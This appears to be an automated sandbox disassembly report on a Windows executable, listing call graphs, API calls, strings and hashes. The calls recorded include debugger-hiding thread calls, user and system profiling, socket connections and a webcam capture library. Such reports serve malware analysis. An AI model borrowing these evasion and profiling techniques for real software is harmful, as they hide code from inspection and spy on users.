__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38772->38775 38776 5833f7 38775->38776 38784 58359f 38776->38784 38778 583416 __Xtime_diff_to_millis2 38779 583422 Sleep 38778->38779 38781 58345b 38778->38781 38780 58359f _xtime_get GetSystemTimeAsFileTime 38779->38780 38780->38778 38782 68a492 __Thrd_sleep 5 API calls 38781->38782 38783 41cf63 38782->38783 38783->38762 38785 5835ae 38784->38785 38787 5835bb __aulldvrm 38784->38787 38785->38787 38788 5834d9 GetSystemTimeAsFileTime ___crtFlsFree 38785->38788 38787->38778 38788->38787 38789 4255f7 38790 425612 38789->38790 38793 42560c 38789->38793 38791 425625 WSASend WSAGetLastError 38790->38791 38790->38793 38791->38793 38794 425673 38791->38794 38793->38794 38795 42400c __EH_prolog PostQueuedCompletionStatus EnterCriticalSection LeaveCriticalSection 38793->38795 38795->38794 38796 401138 38797 40113d std::_Throw_Cpp_error 38796->38797 38800 4107b6 38797->38800 38801 4107d3 WSAStartup 38800->38801 38802 401142 38800->38802 38801->38802 38807 69af52 38808 69af60 38807->38808 38810 69af6a 38807->38810 38811 69af38 38808->38811 38814 69add1 38811->38814 38824 690684 38814->38824 38817 69ae3b 38821 69ae62 _free 38817->38821 38836 6ac84f 59 API calls __fassign 38817->38836 38818 69adf0 38835 69af1b 59 API calls __Tolower 38818->38835 38830 6acaa5 38821->38830 38823 69adfa 38823->38810 38825 6906a1 38824->38825 38826 690697 38824->38826 38825->38826 38837 6aa02e 59 API calls __Getcvt 38825->38837 38826->38817 38826->38818 38828 6906db 38838 6aa05b 59 API calls __fassign 38828->38838 38831 690684 __fassign 59 API calls 38830->38831 38832 6acab8 38831->38832 38839 6ac888 38832->38839 38835->38823 38836->38821 38837->38828 38838->38826 38841 6ac8a3 ___crtLCMapStringA 38839->38841 38840 6ac8c9 MultiByteToWideChar 38842 6ac8f3 38840->38842 38843 6aca80 38840->38843 38841->38840 38851 6ac914 ___crtLCMapStringA 38842->38851 38874 6a108e 38842->38874 38844 68a492 __Thrd_sleep 5 API calls 38843->38844 38845 6aca90 38844->38845 38845->38823 38846 6ac95d MultiByteToWideChar 38847 6ac9c9 38846->38847 38850 6ac976 38846->38850 38849 6aca77 __freea 38847->38849 38849->38843 38864 6ab96d 38850->38864 38851->38846 38851->38847 38854 6ac9d8 38856 6ac9f9 ___crtLCMapStringA 38854->38856 38857 6a108e ___crtLCMapStringA 8 API calls 38854->38857 38855 6ac9a0 38855->38847 38855->38849 38858 6ab96d 12 API calls 38855->38858 38859 6aca6e __freea 38856->38859 38860 6ab96d 12 API calls 38856->38860 38857->38856 38858->38847 38859->38847 38861 6aca4d 38860->38861 38861->38859 38862 6aca5c WideCharToMultiByte 38861->38862 38862->38859 38863 6aca9c __freea 38862->38863 38863->38849 38879 6ab221 38864->38879 38867 6ab99d LCMapStringEx 38871 6ab9e4 38867->38871 38868 6ab9c4 38870 6ab9dd LCMapStringW 38868->38870 38870->38871 38872 68a492 __Thrd_sleep 5 API calls 38871->38872 38873 6ab9ef 38872->38873 38873->38847 38873->38854 38873->38855 38876 6a10ca _free 38874->38876 38877 6a109c __Cnd_init 38874->38877 38875 6a10b7 RtlAllocateHeap 38875->38876 38875->38877 38876->38851 38877->38875 38877->38876 38887 6a518a 7 API calls 2 library calls 38877->38887 38880 6ab251 38879->38880 38883 6ab24d 38879->38883 38880->38867 38880->38868 38881 6ab271 38881->38880 38884 6ab27d GetProcAddress 38881->38884 38883->38880 38883->38881 38886 6ab2bd LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 38883->38886 38885 6ab28d __crt_fast_encode_pointer 38884->38885 38885->38880 38886->38883 38887->38877 38888 4337bf 38889 68e3de __CxxThrowException@8 RaiseException 38888->38889 38890 4337c8 __EH_prolog 38889->38890 38914 44db7b __EH_prolog 38890->38914 38894 433808 38931 4607d1 16 API calls std::_Winerror_message 38894->38931 38896 433814 38921 471490 __EH_prolog 38896->38921 38898 433823 38899 411bc8 collate 11 API calls 38898->38899 38900 43385b 38899->38900 38901 411bc8 collate 11 API calls 38900->38901 38913 43386d 38901->38913 38902 433b9f 38903 411bc8 collate 11 API calls 38902->38903 38905 433bae 38903->38905 38904 44db7b 17 API calls 38904->38913 38907 411bc8 collate 11 API calls 38905->38907 38906 41cecb 7 API calls 38906->38913 38908 433bc0 shared_ptr 38907->38908 38910 41cdde __EH_prolog 38910->38913 38911 41ce76 __EH_prolog 38911->38913 38912 411bc8 11 API calls collate 38912->38913 38913->38902 38913->38904 38913->38906 38913->38910 38913->38911 38913->38912 38932 41cd61 18 API calls 38913->38932 38933 44de59 __EH_prolog 38914->38933 38916 44dba2 38917 44dba6 GetTickCount64 38916->38917 38918 44dbae GetTickCount 38916->38918 38919 4337f3 38917->38919 38918->38919 38920 4530a5 53 API calls 2 library calls 38919->38920 38920->38894 38942 68a1e7 38921->38942 38923 4714d9 GetUserNameW 38924 4714f0 38923->38924 38925 461197 14 API calls 38924->38925 38926 4714ff 38925->38926 38927 4ab703 std::_Winerror_message 11 API calls 38926->38927 38928 47150e collate 38927->38928 38929 411bc8 collate 11 API calls 38928->38929 38930 471552 38929->38930 38930->38898 38931->38896 38932->38913 38934 689e2f new 9 API calls 38933->38934 38935 44de89 _abort 38934->38935 38936 44dee4 GetModuleHandleA 38935->38936 38937 44df34 GetProcAddress 38936->38937 38939 44df83 _abort 38937->38939 38940 44dfbf GetSystemInfo GetProductInfo 38939->38940 38941 44df8a shared_ptr _Receive_impl 38939->38941 38940->38941 38941->38916

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 106 47da23-47da5d __EH_prolog call 485f56 109 47da5e-47da64 106->109 110 47da66-47da7d 109->110 111 47da7f-47daac 109->111 110->109 112 47daad-47dab3 111->112 113 47dab5-47dacd 112->113 114 47dacf-47dae8 GetModuleHandleA GetProcAddress 112->114 113->112 115 47db0b-47db14 114->115 116 47daea-47daef 114->116 119 47db16 GetCurrentThread 115->119 120 47db1c-47db21 NtSetInformationThread 115->120 117 47daf1-47daf3 call 40f5b8 116->117 118 47daf8 116->118 117->118 123 47dafa-47db0a 118->123 119->120 120->116 121 47db23-47db28 120->121 124 47db31-47db33 121->124 125 47db2a-47db2c call 40f5b8 121->125 124->123 125->124
                            APIs
                            • __EH_prolog.LIBCMT ref: 0047DA28
                            • GetModuleHandleA.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 0047DAD7
                            • GetProcAddress.KERNEL32(00000000), ref: 0047DADE
                            • GetCurrentThread.KERNEL32 ref: 0047DB16
                            • NtSetInformationThread.NTDLL(?,00000011,00000000,00000000,?,?,00000000,00000000), ref: 0047DB1D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Thread$AddressCurrentH_prologHandleInformationModuleProc
                            • String ID: A
                            • API String ID: 2756751113-3554254475
                            • Opcode ID: be64283b3c99eb43cfab408730693492dcc37ded62b0fa0dcaa4628b277c118a
                            • Instruction ID: 44a9092eb4fce4f9afff90697c039c15edd499dcc9c00362b295a7f757c6932a
                            • Opcode Fuzzy Hash: be64283b3c99eb43cfab408730693492dcc37ded62b0fa0dcaa4628b277c118a
                            • Instruction Fuzzy Hash: 01312471D153499ADB10CFFD99806EDFBB8BF65304F10517EE809AB201E7749E488724
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 186 44de59-44dec1 __EH_prolog call 689e2f call 5077d5 191 44dec2-44dec8 186->191 192 44dee4-44df33 GetModuleHandleA 191->192 193 44deca-44dee2 191->193 194 44df34-44df3a 192->194 193->191 195 44df5c-44df88 GetProcAddress call 5077d5 194->195 196 44df3c-44df5a 194->196 199 44dfb8-44dfbd 195->199 200 44df8a-44df9c call 68a1b1 195->200 196->194 199->200 204 44dfbf-44dfe9 GetSystemInfo GetProductInfo call 68a1b1 199->204 205 44dfa5 200->205 206 44df9e-44dfa0 call 40f5b8 200->206 210 44dfee-44dffa 204->210 207 44dfa7-44dfb7 205->207 206->205 211 44e003-44e006 210->211 212 44dffc-44dffe call 40f5b8 210->212 211->207 212->211
                            APIs
                            • __EH_prolog.LIBCMT ref: 0044DE5E
                            • new.LIBCMT ref: 0044DE84
                            • GetModuleHandleA.KERNEL32(?,?,?,?,00000000), ref: 0044DEEB
                            • GetProcAddress.KERNEL32(?,?), ref: 0044DF6C
                            • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,00000000), ref: 0044DFC6
                            • GetProductInfo.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 0044DFD8
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Info$AddressH_prologHandleModuleProcProductSystem
                            • String ID:
                            • API String ID: 1760484215-0
                            • Opcode ID: 5b3f3d485b9ea022324a646840839423c089f44138266fba638109602895a35c
                            • Instruction ID: 0b433a4e069d78135e3db23fed4c592dc4d79eab52225e25e556f3b17f67ecdd
                            • Opcode Fuzzy Hash: 5b3f3d485b9ea022324a646840839423c089f44138266fba638109602895a35c
                            • Instruction Fuzzy Hash: 0B513B32D04349AAEB11DFB8DC81AEEFBB4FF55310F10412EE949A7252EB345A888710
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00471495
                            • GetUserNameW.ADVAPI32(00000000,?), ref: 004714E1
                              • Part of subcall function 00461197: __EH_prolog.LIBCMT ref: 0046119C
                              • Part of subcall function 004AB703: std::_Deallocate.LIBCONCRT ref: 004AB733
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$DeallocateNameUserstd::_
                            • String ID:
                            • API String ID: 1695679120-0
                            • Opcode ID: 0b6644eb9846197ec39195b45731547c1c4120041d841a2dcf73801215e78122
                            • Instruction ID: d655e893a5e8ff1d491b0e6926b5f2c26dfcdca79071f98dadbf90846d52d241
                            • Opcode Fuzzy Hash: 0b6644eb9846197ec39195b45731547c1c4120041d841a2dcf73801215e78122
                            • Instruction Fuzzy Hash: 2A218D71D042489FDB14EFACD985AEEBBF8EF09704F10456EE006E7281DBB45A05CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 004157A1
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Recv
                            • String ID:
                            • API String ID: 4192927123-0
                            • Opcode ID: c62c7c3c7b8fe5f77f2d802cc1d1c4721b2ce0b15eb23c3f888527f01b87accb
                            • Instruction ID: 5bea4bdaf11f897f62dfeb54fd0e94af83be17af8b353cdab7f5e046acebae1d
                            • Opcode Fuzzy Hash: c62c7c3c7b8fe5f77f2d802cc1d1c4721b2ce0b15eb23c3f888527f01b87accb
                            • Instruction Fuzzy Hash: 1211E5B1A0070AEFDB208F95C8824FBF768EB80764F20416BF82553380D7785D908795
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • __EH_prolog.LIBCMT ref: 00571F10
                            • new.LIBCMT ref: 00571F37
                              • Part of subcall function 005717F8: __EH_prolog.LIBCMT ref: 005717FD
                              • Part of subcall function 005717F8: new.LIBCMT ref: 0057182A
                              • Part of subcall function 005717F8: InitializeCriticalSection.KERNEL32(0000001C,00000000,007A4460,?,?,00571F4A,?,?,?,0040F09B), ref: 0057184D
                              • Part of subcall function 005717F8: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,00571F4A,?,?,?,0040F09B), ref: 00571864
                            • _wprintf.LEGACY_STDIO_DEFINITIONS ref: 00571F78
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$CreateCriticalEventInitializeSection_wprintf
                            • String ID: ***** VIDEOINPUT LIBRARY - %2.04f - TFW07 *****$AYUV$AYUV$I420$I420$IYUV$IYUV$MJPG$MJPG$UYVY$UYVY$Y211$Y211$Y411$Y411$Y41P$Y41P$YUY2$YUY2$YUYV$YUYV$YV12$YV12$YVU9$YVU9$YVYU$YVYU
                            • API String ID: 550282347-3367503751
                            • Opcode ID: 14738bc5c8039185295264d065c2f7682aa518b2c46b38245d9382e2969ddd98
                            • Instruction ID: f9716c8469a36a553641a67d4dd0ff90e87979c69e3c6f18fd75f9a9b42338b5
                            • Opcode Fuzzy Hash: 14738bc5c8039185295264d065c2f7682aa518b2c46b38245d9382e2969ddd98
                            • Instruction Fuzzy Hash: B941F762D00D9487D713CF48A8063436AA3AFD7B24B1A8275BD182F250E7FF8D9296C4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00414B24,00000000,00000000,?,?,00000000,00000000), ref: 00414749
                            • GetLastError.KERNEL32(?,?,00414B24,00000000,00000000,?,?,00000000,00000000), ref: 0041475B
                              • Part of subcall function 0041037A: __EH_prolog.LIBCMT ref: 0041037F
                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00414B24,00000000,00000000,?,?,00000000,00000000), ref: 0041479E
                            • GetLastError.KERNEL32(?,?,00414B24,00000000,00000000,?,?,00000000,00000000), ref: 004147B0
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00414B24,00000000), ref: 00414816
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00414B24,00000000), ref: 0041482C
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00414B24,00000000), ref: 0041483A
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,00414B24,00000000), ref: 0041486C
                            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,00414B24,00000000), ref: 00414873
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseErrorLast$CreateEventHandle$ChangeFindH_prologNotificationObjectSingleWait
                            • String ID: thread$thread.entry_event$thread.exit_event
                            • API String ID: 915737812-3017686385
                            • Opcode ID: 6b311a1f770eee7a72b5a455d37515bdc428d4e3526d2248dc7c780d3341e4c9
                            • Instruction ID: 0b79e7f0c15327e9da17b43a34241b3698589d770cc40297c089d4d07e25d328
                            • Opcode Fuzzy Hash: 6b311a1f770eee7a72b5a455d37515bdc428d4e3526d2248dc7c780d3341e4c9
                            • Instruction Fuzzy Hash: CE41A974A00214AFDB10EFA5C8457AFBBB5EF84354F10807AF805A7391DBB49D46CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • new.LIBCMT ref: 004D0330
                            • GetModuleHandleA.KERNEL32(?), ref: 004D039F
                            • GetProcAddress.KERNEL32(00000000,?), ref: 004D0426
                            • GetModuleHandleA.KERNEL32(?,00000000,00000024), ref: 004D04D5
                            • GetProcAddress.KERNEL32(00000000), ref: 004D04DC
                            • GetNativeSystemInfo.KERNELBASE(?), ref: 004D04EE
                            • GetSystemInfo.KERNEL32(?), ref: 004D04FA
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressHandleInfoModuleProcSystem$Native
                            • String ID: M$e
                            • API String ID: 4128499644-1261679600
                            • Opcode ID: 26a7ac068b73835caf95e5fa928afb245378d7cffc00a078fe7f37421a4a8d80
                            • Instruction ID: 7f076f262e4bb91a6750fffe37d8c54c711c44c40eb3a28a00d27e8eef38a7fb
                            • Opcode Fuzzy Hash: 26a7ac068b73835caf95e5fa928afb245378d7cffc00a078fe7f37421a4a8d80
                            • Instruction Fuzzy Hash: 7C512A319083819AE314DF3CD9857AAF7E4FFA9304F105A1FFAC4D60A2EB74A5858716
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • __EH_prolog.LIBCMT ref: 004152D2
                            • EnterCriticalSection.KERNEL32(?), ref: 004152E6
                            • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00415309
                            • GetLastError.KERNEL32 ref: 00415316
                              • Part of subcall function 0041037A: __EH_prolog.LIBCMT ref: 0041037F
                            • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 00415363
                            • new.LIBCMT ref: 00415371
                            • new.LIBCMT ref: 0041538A
                            • LeaveCriticalSection.KERNEL32(?), ref: 004153CE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalH_prologSectionTimerWaitable$CreateEnterErrorLastLeave
                            • String ID: timer
                            • API String ID: 80991882-1792073242
                            • Opcode ID: cdb135c908b685f4243a48fc5eced90cd833a3d47e2270d03613246561c0a4f8
                            • Instruction ID: 81198b5b4e12bd1187ba2ab20eed8b98814ca33eefdc30da37c94bbb21581d96
                            • Opcode Fuzzy Hash: cdb135c908b685f4243a48fc5eced90cd833a3d47e2270d03613246561c0a4f8
                            • Instruction Fuzzy Hash: 253173B1904344EFDB00DF69C8857EEBBB9EF48314F10816EE845AB242D7B48A85CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • __EH_prolog.LIBCMT ref: 00452F86
                            • socket.WS2_32(00000002,00000002,00000000), ref: 00452FB4
                            • htons.WS2_32(00000009), ref: 00453005
                            • connect.WS2_32(00000000,?,00000010), ref: 00453016
                            • closesocket.WS2_32(00000000), ref: 00453022
                              • Part of subcall function 00452EC0: __EH_prolog.LIBCMT ref: 00452EC5
                              • Part of subcall function 00452EC0: WSAStartup.WS2_32(00000101,?), ref: 00452EFC
                              • Part of subcall function 00452EC0: gethostbyname.WS2_32(?), ref: 00452F1B
                              • Part of subcall function 00452EC0: inet_ntoa.WS2_32(?), ref: 00452F28
                            • getsockname.WS2_32(00000000,?,00000010), ref: 00453041
                            • closesocket.WS2_32(00000000), ref: 0045304D
                            • inet_ntop.WS2_32(00000002,7F000001,?,00000016), ref: 0045305E
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prologclosesocket$Startupconnectgethostbynamegetsocknamehtonsinet_ntoainet_ntopsocket
                            • String ID:
                            • API String ID: 633287244-0
                            • Opcode ID: f5f5fbd19dbca0a862f7eb61407344802759e4f89fe51e6e2834ba27e1eaab73
                            • Instruction ID: 5b0bf888ce328ebc8f7654541aaef070da74032fad1407d6ff225a7c75816ed1
                            • Opcode Fuzzy Hash: f5f5fbd19dbca0a862f7eb61407344802759e4f89fe51e6e2834ba27e1eaab73
                            • Instruction Fuzzy Hash: 8B319571D00208ABDB10DBE5EC49AEEBB7DEF44711F10450BF912E22D2D7B849458B69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 127 6ac888-6ac8a1 128 6ac8a3-6ac8b3 call 6a15e6 127->128 129 6ac8b7-6ac8bc 127->129 128->129 139 6ac8b5 128->139 130 6ac8c9-6ac8ed MultiByteToWideChar 129->130 131 6ac8be-6ac8c6 129->131 133 6ac8f3-6ac8ff 130->133 134 6aca80-6aca93 call 68a492 130->134 131->130 137 6ac953 133->137 138 6ac901-6ac912 133->138 143 6ac955-6ac957 137->143 141 6ac931-6ac942 call 6a108e 138->141 142 6ac914-6ac923 call 68a5c0 138->142 139->129 145 6aca75 141->145 154 6ac948 141->154 142->145 153 6ac929-6ac92f 142->153 144 6ac95d-6ac970 MultiByteToWideChar 143->144 143->145 144->145 149 6ac976-6ac988 call 6ab96d 144->149 148 6aca77-6aca7e __freea 145->148 148->134 155 6ac98d-6ac991 149->155 156 6ac94e-6ac951 153->156 154->156 155->145 157 6ac997-6ac99e 155->157 156->143 158 6ac9d8-6ac9e4 157->158 159 6ac9a0-6ac9a5 157->159 161 6aca30 158->161 162 6ac9e6-6ac9f7 158->162 159->148 160 6ac9ab-6ac9ad 159->160 160->145 163 6ac9b3-6ac9cd call 6ab96d 160->163 164 6aca32-6aca34 161->164 165 6ac9f9-6aca08 call 68a5c0 162->165 166 6aca12-6aca23 call 6a108e 162->166 163->148 178 6ac9d3 163->178 169 6aca6e-6aca74 __freea 164->169 170 6aca36-6aca4f call 6ab96d 164->170 165->169 176 6aca0a-6aca10 165->176 166->169 177 6aca25 166->177 169->145 170->169 181 6aca51-6aca58 170->181 180 6aca2b-6aca2e 176->180 177->180 178->145 180->164 182 6aca5a-6aca5b 181->182 183 6aca94-6aca9a 181->183 184 6aca5c-6aca6c WideCharToMultiByte 182->184 183->184 184->169 185 6aca9c-6acaa3 __freea 184->185 185->148
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,006ACAD9,00000001,00000001,?), ref: 006AC8E2
                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,006ACAD9,00000001,00000001,?,?,?,?), ref: 006AC968
                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 006ACA62
                            • __freea.LIBCMT ref: 006ACA6F
                              • Part of subcall function 006A108E: RtlAllocateHeap.NTDLL(00000000,00000003,00000003,?,006AAD9E,00001000,00000000,?,?,?,006A082B,00000000,00000000,00000000,?,?), ref: 006A10C0
                            • __freea.LIBCMT ref: 006ACA78
                            • __freea.LIBCMT ref: 006ACA9D
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                            • String ID:
                            • API String ID: 1414292761-0
                            • Opcode ID: 1ec1923b02ff4a2d3de14dc911272f89a5217b01c918c1f7141e847b39a047c4
                            • Instruction ID: 86292834f738c96dbc1cf993336d3d24c26be9c074e51f227bd2506d47692d73
                            • Opcode Fuzzy Hash: 1ec1923b02ff4a2d3de14dc911272f89a5217b01c918c1f7141e847b39a047c4
                            • Instruction Fuzzy Hash: B151F67260021AABEB25AF64CC41EFF77ABEF42760F144229FE04D6254EB34DC40DA90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • __EH_prolog.LIBCMT ref: 004B02E5
                            • std::_Lockit::_Lockit.LIBCPMT ref: 004B02F4
                              • Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
                              • Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
                              • Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1
                            • std::locale::_Getfacet.LIBCPMT ref: 004B0314
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004B034B
                            • std::_Facet_Register.LIBCPMT ref: 004B0361
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 004B036E
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$H_prologLockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                            • String ID:
                            • API String ID: 1252875284-0
                            • Opcode ID: c0e17db30a694421d04265faf59378f693b64b9600864ea3d7819ed5d6e79e0d
                            • Instruction ID: 78f492c9bfe4b46bd4934e7f848da8e9cd49b79d55c67d64c25b280fc1e3c0ca
                            • Opcode Fuzzy Hash: c0e17db30a694421d04265faf59378f693b64b9600864ea3d7819ed5d6e79e0d
                            • Instruction Fuzzy Hash: 8B11A772E005299BCB14FBA4D805AEE7775FF44721F50421EF81567291DB389A01C7A4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 233 430b17-430b4e call 68e3de __EH_prolog call 429bc7 238 430b50 233->238 239 430b69-430b8e 233->239 240 430b53 238->240 242 430b96-430b98 239->242 241 430b56 240->241 243 430b58-430b68 241->243 244 430ba5-430bb5 242->244 245 430b9a-430ba3 242->245 247 430bb7-430bba 244->247 248 430bbc-430bc1 244->248 245->243 247->240 249 430bc4-430bc6 248->249 250 430bc8-430bd6 249->250 251 430bdd-430bdf 249->251 252 430bfb-430bff 250->252 253 430bd8-430bdb 250->253 254 430c01-430c1c 251->254 255 430be1 251->255 252->249 253->251 260 430c23-430c3a 254->260 261 430c1e-430c21 254->261 256 430be4-430be9 255->256 256->241 257 430bef-430bf6 call 40f5b8 256->257 257->241 265 430c41-430c5f 260->265 266 430c3c-430c3f 260->266 261->256 268 430c61-430c64 265->268 269 430c69-430c81 265->269 266->256 268->256 271 430c83-430c85 call 40f5b8 269->271 272 430c8a 269->272 271->272
                            APIs
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00430B1B
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            • __EH_prolog.LIBCMT ref: 00430B26
                              • Part of subcall function 00429BC7: VerSetConditionMask.KERNEL32(00000000,00000000,00000080,00000001,?,?,00000000), ref: 00429C21
                              • Part of subcall function 00429BC7: VerifyVersionInfoW.KERNEL32(0000011C,00000080,00000000), ref: 00429C31
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: ConditionExceptionException@8H_prologInfoMaskRaiseThrowVerifyVersion
                            • String ID: evY$ovY$yvY
                            • API String ID: 427066989-2562377268
                            • Opcode ID: 7e66fc0fb2390a2c9767167f78ed8f89248d71a62f7d286e4ce8b8af001c0436
                            • Instruction ID: 69eeb7d7c3b84b7ea36d890f3107908ae79c651bf5a834563b2563b6c9d57f6f
                            • Opcode Fuzzy Hash: 7e66fc0fb2390a2c9767167f78ed8f89248d71a62f7d286e4ce8b8af001c0436
                            • Instruction Fuzzy Hash: 63511770D04209EFDB10CF99D895AAEFBB8FB08308F24526AE505A7281C7799D058B69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
